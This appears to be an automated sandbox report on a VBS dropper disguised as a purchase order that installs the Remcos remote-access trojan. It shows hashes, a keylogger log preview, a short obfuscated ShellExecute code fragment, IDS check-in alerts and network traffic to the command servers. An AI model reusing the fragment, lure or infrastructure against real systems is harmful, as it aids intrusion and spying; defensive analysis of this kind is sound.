                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                    Malicious:false
                                    Preview:..
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                    Category:dropped
                                    Size (bytes):488768
                                    Entropy (8bit):5.979392407654796
                                    Encrypted:false
                                    SSDEEP:6144:niCujNDnnfznda2g8TOCadpQGBybgMrSWIX5d1Wu7a+3OMXXIJCYSZWjqBkqrmc:niD9frdaMTOlQKycMpyH37J4JsEjehZ
                                    MD5:9DEC6AB653D40EF8F841947C14B6143C
                                    SHA1:86E240DB138EE3125BD7EE57EBA79D6FAFCBE5CC
                                    SHA-256:14C0D60842557CBD3A432FCD7AD8C4C0BD0E33340F88DC917186AA81DF2F1656
                                    SHA-512:58201866E93B4F21E381D4A9C1EFE9BB3A441E27C391BB331611F48B0008EC6E6FE0F89A933BEB7E8331A494BDDCB62ECCADDB648247DAAF4F608B04989634B5
                                    Malicious:false
                                    Preview:Zg9y9/6b60ZI5SNOs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7OzD4GjAAAAm97561J5TaFGVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWm93WD2ng60RFSasliYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiQ/Yzdn8618jTzIod3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d+m9AAAAD+XpZg/5/etO9zLhBfX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX1gMzZ0GYP4sTrXOSNSFmlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlD/X62fTrWjGm6lZtbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbWYP5cXZ+Otc38lGWWhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGi7zToJAN7G2MLr
                                    Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):394
                                    Entropy (8bit):3.363054912147401
                                    Encrypted:false
                                    SSDEEP:12:6lVKDecmlV8VQclVS6bWFe5UlVejlVxbW+:6/KScm/SQc/jWqU/ej/dW+
                                    MD5:9F8CA371F28506C86D89E4508D550B7C
                                    SHA1:CD6CE510CDF9B6856993A578DC2DFE333D22B445
                                    SHA-256:C30C5032A9448262C8DDCAC8F663960458D99086B0C8CC5A21FBEF49E8F4BB25
                                    SHA-512:ED5BF716742AE2A5EB5930F185437732D494AC66912318AB656078B49CE96DCF6E2B0E9A16478289C4A483B00A8F7C3E4E94762EE02AF1AC6C493CD2034E2C22
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\kpburtts.dat, Author: Joe Security
                                    Preview:....[.2.0.2.4./.0.7./.0.1. .0.9.:.3.7.:.4.2. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.0.7./.0.1. .0.9.:.3.7.:.4.3. .R.u.n.].........[.2.0.2.4./.0.7./.0.1. .0.9.:.3.7.:.4.5. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.0.7./.0.1. .0.9.:.3.7.:.4.9. .R.u.n.].........[.2.0.2.4./.0.7./.0.1. .0.9.:.3.7.:.5.2. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                    File type:ASCII text, with very long lines (1424), with CRLF line terminators
                                    Entropy (8bit):5.347402324547579
                                    TrID:
                                    • Visual Basic Script (13500/0) 100.00%
                                    File name:TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs
                                    File size:22'566 bytes
                                    MD5:003c272edd6f7cf2b08bfc98d1d48c7c
                                    SHA1:a6ee590e3b81dbbce6e550c6dba9256c76cd4e21
                                    SHA256:78e63f6cc614c9dcc77c0c6b8fc6088ce89533d7c05b66b7732904ad6bc886d6
                                    SHA512:4a251916c7e5bef128493ca4f9c303288d9f5934f763f5c383ebf99a671686359cacd977913260ed1c6a3c2e4df36a57873bf4620f7395a70d7eb1b82deb3213
                                    SSDEEP:384:clzV6m2So022lGP9V6+s0flKJpl/5ZrE5HVnS0Re7PIx+5lEPmgww5Bpg3KU7a4i:ozSR022X/523S0e8xPPmKpgY4Rr0j
                                    TLSH:73A229E08F1B3A04CF4B3E91DD2949916AF99199461528B166FC03DDA3C3C6CD2FAD6C
                                    File Content Preview:Function Unsingability....Call Cringingness.ShellExecute("P" & Papirdokumenter, penates, "", "", Luggnagg51)....End Function ....Spetrevlemundstetiser = String(236,"M") ....Rvertogterne = 61512..Supranaturalistic = &H617B..decreers = -54055..dermophobe =
                                    Icon Hash:68d69b8f86ab9a86
                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    07/01/24-15:37:44.155641TCP2032776ET TROJAN Remcos 3.x Unencrypted Checkin505753980192.168.2.6206.123.148.194
                                    07/01/24-15:37:45.014656TCP2032777ET TROJAN Remcos 3.x Unencrypted Server Response398050575206.123.148.194192.168.2.6
                                    TimestampSource PortDest PortSource IPDest IP
                                    Jul 1, 2024 15:37:07.267452002 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:07.267492056 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:07.267594099 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:07.275151968 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:07.275168896 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:07.802347898 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:07.802423954 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:07.804269075 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:07.804279089 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:07.804548979 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:07.811387062 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:07.852505922 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:07.942059040 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:07.942084074 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:07.942158937 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:07.942171097 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:07.961733103 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:07.961815119 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:07.961822987 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.004393101 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.032634020 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.032650948 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.032728910 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.036602974 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.036613941 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.036659002 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.036683083 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.036691904 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.036700964 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.036717892 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.036739111 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.052639008 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.052726030 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.122980118 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.123260975 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.123900890 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.123970985 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.124958038 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.125025988 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.125859976 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.125916958 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.127289057 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.127356052 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.128180027 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.128253937 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.143023014 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.143094063 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.143604994 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.143667936 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.213629961 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.213738918 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.214574099 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.214643955 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.216005087 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.216079950 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.216221094 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.216274977 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.218354940 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.218432903 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.218995094 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.219057083 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.219379902 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.219444036 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.219657898 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.219715118 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.233375072 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.233453035 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.234118938 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.234184027 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.234718084 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.234790087 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.235313892 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.235378981 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.304594994 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.304692030 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.308674097 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.308731079 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.308763981 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.308789015 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.308805943 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.308823109 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.308845043 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.308850050 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.308861971 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.308883905 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.308891058 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.308912039 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.308918953 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.308943987 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.308959961 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.308968067 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.308985949 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.312572002 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.312613964 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.312637091 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.312654018 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.312664986 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.312694073 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.312702894 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.312720060 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.312728882 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.312741995 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.312750101 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.312767029 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.312771082 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.312815905 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.312823057 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.332582951 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.332669973 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.336548090 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.336584091 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.336613894 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.336615086 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.336627960 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.336664915 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.379394054 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.395207882 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.395288944 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.395948887 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.396014929 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.396455050 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.396580935 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.397104025 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.397178888 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.398058891 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.398128986 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.398840904 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.398906946 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.398972034 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.399039030 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.399981022 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.400053978 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.400861025 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.400922060 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.401755095 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.401834965 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.403028965 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.403064966 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.403096914 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.403106928 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.403134108 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.403152943 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.422377110 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.422451973 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.422812939 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.422897100 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.423226118 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.423286915 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.423782110 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.423855066 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.485692978 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.485783100 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.486257076 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.486335039 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.486855030 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.486929893 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.486942053 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.486958981 CEST44349715192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:08.487016916 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:08.495326042 CEST49715443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:39.995122910 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:39.995172977 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:39.995255947 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:40.003865957 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:40.003891945 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:40.519519091 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:40.519634008 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:40.578208923 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:40.578247070 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:40.578574896 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:40.579634905 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:40.679579020 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:40.724502087 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:40.815748930 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:40.815778971 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:40.815964937 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:40.815993071 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:40.816998005 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:40.847160101 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:40.847299099 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:40.906202078 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:40.906300068 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:40.907521009 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:40.907602072 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:40.908246040 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:40.908361912 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:40.938291073 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:40.938378096 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:40.997442007 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:40.997538090 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:40.997792959 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:40.997853994 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:40.998677969 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:40.998759031 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:40.999598980 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:40.999666929 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.000504971 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.000571012 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.001508951 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.001574039 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.028974056 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.029055119 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.029289007 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.029370070 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.094917059 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.095000982 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.095027924 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.095093012 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.095284939 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.095344067 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.095483065 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.095532894 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.096302032 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.096364975 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.096438885 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.096502066 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.119810104 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.119891882 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.119971037 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.120031118 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.120441914 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.120501995 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.120934963 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.121001959 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.164371014 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.164454937 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.178970098 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.179054022 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.179173946 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.179245949 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.179811954 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.179888010 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.180274963 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.180340052 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.180408955 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.180475950 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.180609941 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.180672884 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.181267023 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.181349993 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.181474924 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.181534052 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.182199955 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.182266951 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.182343006 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.182410955 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.183139086 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.183197975 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.210412025 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.210494041 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.210988998 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.211051941 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.211287975 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.211344004 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.211510897 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.211565018 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.269670010 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.269792080 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.269845009 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.269905090 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.270147085 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.270215034 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.270309925 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.270380974 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.270843029 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.270911932 CEST50573443192.168.2.6192.185.112.252
